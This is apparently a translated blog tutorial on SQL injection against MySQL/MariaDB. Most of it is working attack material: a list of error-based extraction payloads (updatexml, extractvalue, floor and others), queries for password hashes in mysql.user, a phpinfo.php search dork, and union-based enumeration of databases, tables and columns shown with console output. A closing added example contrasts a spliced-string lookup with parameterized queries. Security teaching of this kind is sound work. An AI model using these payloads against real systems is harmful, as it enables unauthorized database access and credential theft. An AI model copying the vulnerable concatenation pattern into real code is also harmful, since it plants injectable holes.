SQL Injection

Common SQL functions

  • Common SQL functions
    • MID(string, start position, end position) - take a substring
    • CHAR(ASCII) - return the character for an ASCII code
    • ASCII(char) - return the ASCII code of a character
    • IF(condition, value1, value2) - conditional
    • SUBSTR(string, start position, end position) - take a substring
    • LENGTH(string) - return the length of a string
    • COUNT(column) - return the number of valid records in that column
    • SLEEP(s) - pause for s seconds (numeric, adjustable)
    • # /**/ -- comment markers
    • CONCAT(string1, string2, ...) - concatenate strings
    • LOAD_FILE(filename) - load a file
    • INTO OUTFILE 'filename' - write output to a file

Ten common error-based functions

  • floor()

    • select * from test where id=1 and (select 1 from (select count(*), concat(user(), floor(rand(0)*2)) x from information_schema.tables group by x) a);
  • extractvalue()

    • select * from test where id=1 and (extractvalue(1, concat(0x7e, (select user()), 0x7e)));
  • updatexml()

    • select * from test where id=1 and (updatexml(1, concat(0x7e, (select user()), 0x7e), 1));
  • geometrycollection()

    • select * from test where id=1 and geometrycollection((select * from (select * from (select user()) a) b));
  • multipoint()

    • select * from test where id=1 and multipoint((select * from (select * from (select user()) a) b));
  • polygon()

    • select * from test where id=1 and polygon((select * from (select * from (select user()) a) b));
  • multipolygon()

    • select * from test where id=1 and multipolygon((select * from (select * from (select user()) a) b));
  • linestring()

    • select * from test where id=1 and linestring((select * from (select * from (select user()) a) b));
  • multilinestring()

    • select * from test where id=1 and multilinestring((select * from (select * from (select user()) a) b));
  • exp()

    • select * from test where id=1 and exp(~(select * from (select user()) a));

Common MySQL functions

  • Query the version

    • select version();
  • Query the passwords

    • select password from mysql.user;
  • Query all data

    • select * from mysql.user;

MySQL database configuration files

  • MySQL user privileges

    • information_schema.USER_PRIVILEGES
    • select * from information_schema.USER_PRIVILEGES;
  • MySQL databases and tables

    • information_schema.TABLES
    • select * from information_schema.TABLES;
  • MySQL databases and tables (including columns)

    • information_schema.COLUMNS
    • select * from information_schema.COLUMNS;

SQL injection testing

  • Type into the browser

    • inurl:/phpinfo.php
  • How SQL injection arises

    • These attacks occur when untrusted data is sent to an interpreter as part of a command or query
    • The attacker's malicious data can trick the interpreter
    • into executing unintended commands or accessing data without proper authorization

or-clause SQL injection

  • Purpose
    • retrieve every row of the table
# Normal query
MariaDB [sel]> select * from grades where name='Sunny';
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
+-------+------+---------+------+
# `1 row in set (0.000 sec)`

# Injected query
MariaDB [sel]> select * from grades where name='Sunny' or 1=1;
+-------+------+---------+------+
| name  | sex  | chinese | math |
+-------+------+---------+------+
| Sunny | boy  |      93 |   96 |
| Jerry | boy  |      97 |   91 |
| Marry | girl |      95 |   94 |
| Tommy | boy  |      98 |   94 |
+-------+------+---------+------+
# `4 rows in set (0.001 sec)`
MariaDB [sel]> select * from news where id=0 or 1=1;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript    | 1607050534 |
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
|  3 | 基本知识  | 第3章 语言基础            | 1607052573 |
|  4 | 基本知识  | 第4章 变量、作用域和内存   | 1607070553 |
+----+----------+--------------------------+------------+
# `4 rows in set (0.001 sec)`

order by clause SQL injection

  • Purpose
    • infer the total number of records in the table
MariaDB [sel]> select * from news where id=2 order by 5;
# `ERROR 1054 (42S22): Unknown column '5' in 'order clause'`

MariaDB [sel]> select * from news where id=2 order by 4;
+----+----------+--------------------------+------------+
| id | title    | content                  | createtime |
+----+----------+--------------------------+------------+
|  2 | 基本知识  | 第2章 HTML中的Javascript  | 1607050590 |
+----+----------+--------------------------+------------+
# `1 row in set (0.000 sec)`

union clause SQL injection

  • Purpose
    • infer the total number of fields in the table
# Normal case
MariaDB [sel]> select * from news where id=1;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
+----+----------+------------------------+------------+
# `1 row in set (0.000 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  0 | 0        | 0                      |          0 |
+----+----------+------------------------+------------+
# `2 rows in set (0.006 sec)`

MariaDB [sel]> select * from news where id=1 union select 0,0,0,0,0;
# `ERROR 1222 (21000): The used SELECT statements have a different number of columns`
  • Purpose
    • retrieve mysql data
MariaDB [sel]> select * from news where id=1 union select 1,2,host,4 from mysql.user;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript  | 1607050534 |
|  1 | 2        | 127.0.0.1              |          4 |
|  1 | 2        | ::1                    |          4 |
|  1 | 2        | localhost              |          4 |
+----+----------+------------------------+------------+
# `4 rows in set (0.011 sec)`
  • Purpose
    • retrieve the names of all databases on the server
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_schema from information_schema.TABLES;
+----+-------+---------+--------------------+
| id | title | content | createtime         |
+----+-------+---------+--------------------+
|  1 | 2     | 3       | information_schema |
|  1 | 2     | 3       | mysql              |
|  1 | 2     | 3       | performance_schema |
|  1 | 2     | 3       | phpmyadmin         |
|  1 | 2     | 3       | sel                |
|  1 | 2     | 3       | stu                |
+----+-------+---------+--------------------+
# `6 rows in set (0.018 sec)`
  • Purpose
    • retrieve the names of all tables on the server
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES;
  • Purpose
    • retrieve the names of all tables in a given database
MariaDB [sel]> select * from news where id=0 union select 1,2,3,table_name from information_schema.TABLES where table_schema='sel';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | bank       |
|  1 | 2     | 3       | best       |
|  1 | 2     | 3       | bestmath   |
|  1 | 2     | 3       | grades     |
|  1 | 2     | 3       | news       |
|  1 | 2     | 3       | resume     |
|  1 | 2     | 3       | stu1       |
|  1 | 2     | 3       | stu2       |
+----+-------+---------+------------+
# `8 rows in set (0.012 sec)`
  • Purpose
    • retrieve the names of all columns of a given table
MariaDB [sel]> select * from news where id=0 union select 1,2,3,column_name from information_schema.COLUMNS where table_name='news';
+----+-------+---------+------------+
| id | title | content | createtime |
+----+-------+---------+------------+
|  1 | 2     | 3       | id         |
|  1 | 2     | 3       | title      |
|  1 | 2     | 3       | content    |
|  1 | 2     | 3       | createtime |
+----+-------+---------+------------+
# `4 rows in set (0.016 sec)`
  • Purpose
    • retrieve column contents
MariaDB [sel]> select * from news where id=1 union select 1,2,3,title from sel.news;
+----+----------+------------------------+------------+
| id | title    | content                | createtime |
+----+----------+------------------------+------------+
|  1 | 基本知识  | 第1章 什么是Javascript | 1607050534 |
|  1 | 2        | 3                      | 基本知识   |
+----+----------+------------------------+------------+
# `2 rows in set (0.011 sec)`
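As an added example that is not part of the original post: the post's `grades` table rebuilt in an in-memory SQLite database (standing in for MariaDB; the SQL is the same), showing the string-spliced lookup that the `or 1=1` style input from the or-clause section defeats beside a parameterized lookup, plus an allowlisted ORDER BY, since sort columns cannot be bound as parameters (the point behind the order by section). The function names and sample rows are my own construction.

```python
"""Vulnerable vs. parameterized lookup on the post's grades table (SQLite
stands in for MariaDB). All names and data here are constructed for the example."""
import sqlite3

# Constructed sample data, matching the rows shown in the post.
GRADES = [("Sunny", "boy", 93, 96), ("Jerry", "boy", 97, 91),
          ("Marry", "girl", 95, 94), ("Tommy", "boy", 98, 94)]
# ORDER BY cannot take a bound parameter, so sortable columns are allowlisted.
SORTABLE = {"name", "sex", "chinese", "math"}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE grades (name TEXT, sex TEXT, chinese INT, math INT)")
    conn.executemany("INSERT INTO grades VALUES (?,?,?,?)", GRADES)
    return conn


def lookup_vulnerable(conn, name):
    # Untrusted input is spliced into the statement text. The input
    # `Sunny' or '1'='1` turns the filter into  name='Sunny' or '1'='1'
    # and, exactly as in the post, the whole table comes back.
    sql = "SELECT * FROM grades WHERE name='" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # The value is bound as data: the quote and the `or` never reach the parser,
    # so the hostile string simply matches no row.
    return conn.execute("SELECT * FROM grades WHERE name=?", (name,)).fetchall()


def list_sorted(conn, column):
    # Identifiers cannot be bound; a fixed allowlist replaces them, which also
    # rules out the `order by N` column-count probing shown in the post.
    if column not in SORTABLE:
        raise ValueError("unsupported sort column: %r" % column)
    return conn.execute("SELECT name FROM grades ORDER BY " + column).fetchall()


if __name__ == "__main__":
    db = connect()
    hostile = "Sunny' or '1'='1"
    print(len(lookup_vulnerable(db, hostile)))  # 4: the whole table leaks
    print(len(lookup_safe(db, hostile)))        # 0: no such name
    print(list_sorted(db, "chinese"))
```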
Original article: https://www.cnblogs.com/SharkJiao/p/14100690.html